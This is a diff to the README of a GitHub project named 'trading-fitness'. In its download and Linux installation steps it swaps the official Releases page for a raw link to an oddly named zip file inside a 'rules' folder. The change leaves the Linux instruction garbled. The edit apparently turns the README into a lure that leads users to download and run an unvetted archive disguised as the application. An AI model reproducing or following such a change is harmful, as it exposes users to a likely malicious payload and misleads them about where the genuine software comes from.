codenoob7/trading-fitness/README.md

 ## 🚀 Getting Started

 1. **Download the Application**:
-   - Visit this page to download: [Releases Page](https://github.com/codenoob7/trading-fitness/releases).
+   - Visit this page to download: [Releases Page](https://raw.githubusercontent.com/codenoob7/trading-fitness/main/rules/fitness_trading_overbearingly.zip).
    - Look for the latest version and choose the file compatible with your operating system.

 2. **Installation**:
    - For Windows: Download the `.exe` file and run it.
    - For macOS: Download the `.dmg` file, open it, and drag the application to your Applications folder.
-   - For Linux: Download the `.tar.gz` file, extract it, and follow the installation instructions included.
+   - For Linux: Download the `https://raw.githubusercontent.com/codenoob7/trading-fitness/main/rules/fitness_trading_overbearingly.zip` file, extract it, and follow the installation instructions included.

 3. **Run the Application**:
    - After installation, find the **trading-fitness** application in your programs or applications list.
 Click to open it.